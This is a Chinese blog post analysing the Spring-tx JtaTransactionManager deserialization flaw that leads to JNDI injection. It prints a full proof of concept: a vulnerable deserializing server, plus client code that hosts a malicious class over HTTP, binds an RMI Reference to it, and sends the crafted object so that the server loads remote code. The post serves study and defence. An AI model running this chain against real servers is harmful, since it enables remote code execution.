Spring RMI反序列化漏洞分析

最新推荐文章于 2023-10-27 18:34:26 发布
最新推荐文章于 2023-10-27 18:34:26 发布
阅读量833 收藏 1
点赞数
分类专栏: java安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43936524/article/details/115506821
版权

文章目录

概况

漏洞的入口在于Spring-tx-xxx.jar中的JtaTransactionManager重写了ReadObject方法,该方法中的UserTransactionName可控,且初始化UserTransactionName的时候调用了Jndi的lookup方法,导致 Jndi注入的问题。

ReadObject流程

首先是重写的ReadObject函数

private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
    ois.defaultReadObject();
    this.jndiTemplate = new JndiTemplate();
    this.initUserTransactionAndTransactionManager();
    this.initTransactionSynchronizationRegistry();
}

跟入initUserTransactionAndTransactionManager()函数
该函数的作用为初始化UserTransactionName和TransactionManger

protected void initUserTransactionAndTransactionManager() throws TransactionSystemException {
    if (this.userTransaction == null) {
        if (StringUtils.hasLength(this.userTransactionName)) {
            this.userTransaction = this.lookupUserTransaction(this.userTransactionName);
            this.userTransactionObtainedFromJndi = true;
        } else {
            this.userTransaction = this.retrieveUserTransaction();
            if (this.userTransaction == null && this.autodetectUserTransaction) {
                this.userTransaction = this.findUserTransaction();
            }
        }
    }

从代码中可以看出如果传入的UserTransactionName不为空则会调用lookupUserTransaction,函数的作用为通过Jndi地址去寻找UserTransaction实例

protected UserTransaction lookupUserTransaction(String userTransactionName) throws TransactionSystemException {
    try {
        if (this.logger.isDebugEnabled()) {
            this.logger.debug("Retrieving JTA UserTransaction from JNDI location [" + userTransactionName + "]");
        }

        return (UserTransaction)this.getJndiTemplate().lookup(userTransactionName, UserTransaction.class);
    } catch (NamingException var3) {
        throw new TransactionSystemException("JTA UserTransaction is not available at JNDI location [" + userTransactionName + "]", var3);
    }
}

跟入查看lookup方法

public Object lookup(final String name) throws NamingException {
    if (this.logger.isDebugEnabled()) {
        this.logger.debug("Looking up JNDI object with name [" + name + "]");
    }

    return this.execute(new JndiCallback<Object>() {
        public Object doInContext(Context ctx) throws NamingException {
            Object located = ctx.lookup(name);
            if (located == null) {
                throw new NameNotFoundException("JNDI object with [" + name + "] not found: JNDI implementation returned null");
            } else {
                return located;
            }
        }
    });
}

可以看出调用了getJndiTemplate的lookup方法,而此处地址UserTransactionName可以为攻击者控制的恶意RMI服务器地址(如127.0.0.1/evil.class),服务器反序列化包含恶意UserTransactionName的对象时,会从其指向的地址加载工厂类,此时恶意类的静态代码会执行,从而导致Jndi注入问题。

Jndi注入POC分析

poc地址为Spring-jndi
poc采用了RMI形式的jndi注入,jdk版本必须在8u121一下,高版本的jdk引入了trustUrlCodeBase变量默认为false,会导致无法正确引入外部的类!!!

server部分

server部分比较简单,即监听一个端口等待客户端的连接,连接后读取数据流并调用ReadObject反序列化为对象

public class ExploitableServer {
	public static void main(String[] args) {
		try {
			ServerSocket serverSocket = new ServerSocket(9999);
			// 在端口9999建立Socket等待客户端的连接
			System.out.println("服务器开始监听 "+serverSocket.getLocalPort() + "端口");
			while(true) {
				// 与客户端建立连接 读取客户端传来的数据
				Socket socket=serverSocket.accept();
				System.out.println("建立连接: "+socket.getInetAddress());				
				ObjectInputStream objectInputStream = new ObjectInputStream(socket.getInputStream());
				try {
					// 进行反序列化操作
					Object object = objectInputStream.readObject();
					System.out.println("从输入流中获取的对象为 "+object);									
				} catch(Exception e) {
					System.out.println("ReadObject过程捕获到异常");									
					e.printStackTrace();
				}				
			}
		} catch(Exception e) {
			e.printStackTrace();
		}
	}
}

client部分

client部分我把代码分为三个部分

  • 第一部分是建立起一个Http服务器用来托管恶意的class文件
  • 第二部分是创建RMI注册表并与恶意Reference绑定
  • 第三部分为创建恶意对象并发送至服务端

第一部分代码:

String serverAddress = "127.0.0.1";
int port = Integer.parseInt("9999");
String localAddress= "127.0.0.1";

System.out.println("Starting HTTP server");
HttpServer httpServer = HttpServer.create(new InetSocketAddress(80), 0);
httpServer.createContext("/",new HttpFileHandler());
httpServer.setExecutor(null);
httpServer.start();

在本地80端口建立起http服务器,设置负责处理连接的HttpFileHandler函数,该函数的功能即负责返回恶意类ExploitObject内容

第二部分代码:

System.out.println("Creating RMI Registry");
Registry registry = LocateRegistry.createRegistry(1099);
Reference reference = new javax.naming.Reference("ExportObject","ExportObject","http://"+serverAddress+"/");
ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(reference);
registry.bind("Object", referenceWrapper);

建立RMI注册表,当攻击者客户端与服务器建立连接时,服务器会根据RMI地址rmi://127.0.0.1:1099/Object尝试访问此处建立的RMI注册表,并通过Object与恶意类包装referenceWrapper的绑定,获得一个reference的返回结果

第三部分代码:

System.out.println("Connecting to server "+serverAddress+":"+port);
Socket socket=new Socket(serverAddress,port);
System.out.println("Connected to server");
String jndiAddress = "rmi://"+localAddress+":1099/Object";
// 建立包含恶意rmi地址的JtaTransactionManager对象
org.springframework.transaction.jta.JtaTransactionManager object = new org.springframework.transaction.jta.JtaTransactionManager();
object.setUserTransactionName(jndiAddress);
// 发送恶意对象
System.out.println("Sending object to server...");
ObjectOutputStream objectOutputStream = new ObjectOutputStream(socket.getOutputStream());
objectOutputStream.writeObject(object);
objectOutputStream.flush();

建立JtaTransactionManager对象并把userTransactionName设置为恶意rmi地址,并发送至服务端

恶意类部分

public class ExportObject {
	public ExportObject() {
		try {
			while(true) {
				System.out.println("running injected code...");
				Thread.sleep(1000);
			}
		} catch(Exception e) {
			e.printStackTrace();
		}
	}
}

整体的攻击流程

最后来总结下整体的攻击流程
1.受害者服务器上Spring-tx包含了可以被利用的JtaTransactionManager类,并提供了反序列化的接口。

2.攻击者建立JtaTransactionManager对象并将userTransactionName字段改为RMI注册表的地址(rmi://127.0.0.1:1099/Object),将恶意对象发送至服务端的反序列化接口。

3.服务端接收到恶意对象后执行反序列化操作,触发ReadObject方法,最后利用lookup方法去访问攻击者的rmi注册表

4.此时攻击者RMI服务端已经将恶意类ExploitObject的Reference与Object绑定,故服务端访问注册表后会获得恶意类的Reference。

5.服务端获得恶意类Reference后,会访问本地Classpath中是否有恶意类ExportObject(这个类是攻击者创造的,服务器本地当然不会有),在本地找不到恶意类后,就会执行UrlLoadClass去远程服务器上(Reference中CodeBase地址指向了远程服务器)寻找恶意类。

6.而Client第一部分的代码建立的Http服务器就充当了托管ExploitObject恶意类的作用,接收到服务器的请求后将恶意类返回,此时服务端接受到返回的恶意类并加载,就会执行其中静态区的恶意代码。

其中4,5,6步骤为jndi注入的知识,需要理解rmi的交互过程。

kit_1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
JAVA反序列化漏洞浅析
谢公子的博客
12-20 9380
目录 反序列化漏洞 序列化和反序列化 JAVA WEB中的序列化和反序列化 对象序列化和反序列范例 JAVA中执行系统命令 重写readObject()方法 Apache Commons Collections 反序列化漏洞payload JAVA Web反序列化漏洞的挖掘和利用 由于本人并非JAVA程序员,所以对JAVA方面的知识不是很懂,仅仅是能看懂而已。本文参照几位大佬...
Spring-Core RCE反序列化漏洞原理与复现
FisrtBqy的博客
05-15 2026
Spring-Beans RCE反序列化漏洞原理与复现
SpringBoot修复Spring AMQP反序列化漏洞(CVE-2023-34050)
最新发布
记录点滴
10-27 4476
问题描述: 2023年10月 Spring官方披露 CVE-2023-34050 Spring AMQP反序列化漏洞漏洞。由于 SimpleMessageConverter 或 SerializerMessageConverter 默认未配置白名单,导致可以反序列化任意类。新版本中在未配置白名单的情况下则不允许反序列化任意类。 解决的建议: 1.spring-amqp版本低于2.4.17的用户应升级到2.4.17 2.spring-amqp是3.0.0至3.0.9版本的用户应升级至3.0.10
java/spring 等相关框架 漏洞原理汇总
FREEDOM
03-31 1329
JNDI 中的 rmi或ldap 所造成漏洞 rmi 客户端与服务端之间 传输的是序列化后的类实例对象,然后在客户端在反序列化生成对象,并初始化调用构造方法。 ldap 协议也会造成本地执行远程class文件的问题,不同与rmi,ldap 会加载远程class类文件到本进行实例化构造方法!!! 参考:https://liuhuiyao.blog.csdn.net/article/details/121877227 log4j的 jndi漏洞 log4j-2.x 版本jndi漏洞(使用ldap协议.
【网络安全】Spring框架漏洞总结(二)
qq_44005305的博客
01-06 698
Spring Web Flow是Spring的一个子项目,主要目的是解决跨越多个请求的、用户与服务器之间的、有状态交互问题,提供了描述业务流程的抽象能力。Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
java httpinvoker漏洞_Java反序列化漏洞学习
weixin_39683021的博客
02-16 672
序列化是Java提供的一种对象持久化保存的技术。常规对象在程序结束后会被回收,如果想把对象持久保存方便下次使用,需要序列化和反序列化。序列化有两个前提:类必须实现java.io.serializable接口类所有字段都必须是可序列化的反序列化漏洞利用原理1. 利用重写ObjectInputStream的readObject重写ObjectInputStream的readObject方法时,可执行恶...
javaRMI反序列化漏洞验证工具
08-21
**Java RMI反序列化漏洞概述** Java RMI反序列化漏洞主要源于不正确的类型检查和信任机制。当接收到未经验证的远程调用时,如果服务器没有正确地校验或限制输入数据,攻击者可以通过构造恶意序列化数据来操控远程...
Java反序列化漏洞介绍书籍
08-17
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在Java应用程序中。反序列化是将已序列化的对象数据转换回其原始对象状态的过程。当这个过程处理不当时,恶意用户可以利用这些漏洞来执行任意代码,从而导致...
JAVA反序列化漏洞知识点整理
01-20
jenkins反序列漏洞跟过一遍之后,虽说梳理清楚了漏洞触发的大体流程,但是对于JAVA反序列化漏洞导致代码执行的原理仍旧不懂,因此有必要整理JAVA反序列化漏洞相关的知识点。  JAVA反序列化漏洞  反序列化漏洞的...
java反序列化漏洞-验证.rar
06-25
压缩包内的“attackRMI.jar”可能是用来模拟远程方法调用(RMI)场景的,因为RMI是Java反序列化漏洞的常见利用场景之一。RMI允许远程对象像本地对象一样被调用,但如果没有正确处理反序列化的对象,就可能成为攻击的...
java反序列化漏洞工具AllInOne
01-05
java反序列化漏洞检测工具集 支持 jboss weblogic Websphere 本工具仅为方便管理员发现和展示漏洞的危害性,请勿用于非法用途
java httpinvoker漏洞_一次Java反序列化漏洞的 “盲”利用
weixin_39979617的博客
02-16 397
在黑盒渗透测试中,我们遇到了一个 Java Web 应用程序,它向我们提供了一个登录页面。尽管我们设法绕过了认证机制,但是我们却做不了什么事情。攻击面还是很小,只能篡改一些东西。1. 确定入口点在登录页面中,我注意到每个登录请求都发送了一个隐藏的 POST 参数:这是个 Base64 RO0 (AC ED 的 HEX 编码)编码的字符串,证实了我们处理的是 Base64 编码过的 Java 序列化...
京东消防猿的Spring 框架的反序列化漏洞分析与实践
qq_41534566的博客
01-12 1397
分析 介绍 漏洞介绍 国外的研究人员zero thoughts发现了一个Spring框架的反序列化远程代码执行漏洞spring-tx.jar包中的org.springframework.transaction.jta.JtaTransactionManager类存在JNDI反序列化问题。只要创建一个JtaTransactionManager 对象让userTransactionName
Java 安全之反序列化漏洞
hl1293348082的专栏
03-30 7972
1.序列化与反序列化: 序列化与反序列化对于 Java 程序员来说,应该不算陌生了,序列化与反序列化简单来说就是 Java 对象与数据之间的相互转化。 那么对于完全面向对象的 Java 语言来说为什么要有序列化机制? 实质上,序列化机制并不只局限于 Java 语言,序列化的本质是内存对象到数据流的一种转换,我们知道内存中的东西不具备持久性,但有些场景却需要将对象持久化保存或传输。例如缓存系统中存储了用户的 Session,如果缓存系统直接下线,带系统重启后用户就需要重新登陆,为了使缓存系统内存中的 S
Spring反序列化漏洞分析以及利用
weixin_34099526的博客
11-16 1065
【转】http://www.open-open.com/news/view/1225d07 本文转自fatshi51CTO博客,原文链接:http://blog.51cto.com/duallay/1922022,如需转载请自行联系原作者 ...
反序列化漏洞汇总
热门推荐
weixin_29324013的博客
07-03 4万+
反序列化漏洞汇总1、概述序列化是让Java对象脱离Java运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。 Java 序列化是指把 Java 对象转换为字节序列的过程,便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化。反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类...
Spring framework 反序列化漏洞
weixin_30328063的博客
12-28 602
理解这个漏洞需要先看freebuff上的jdni的小例子。 jndi注入在jdk8u121绕过参考这俩篇文章: https://bl4ck.in/tricks/2019/01/04/JNDI-Injection-Bypass.html https://www.veracode.com/blog/research/exploiting-jndi-injections-java server...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值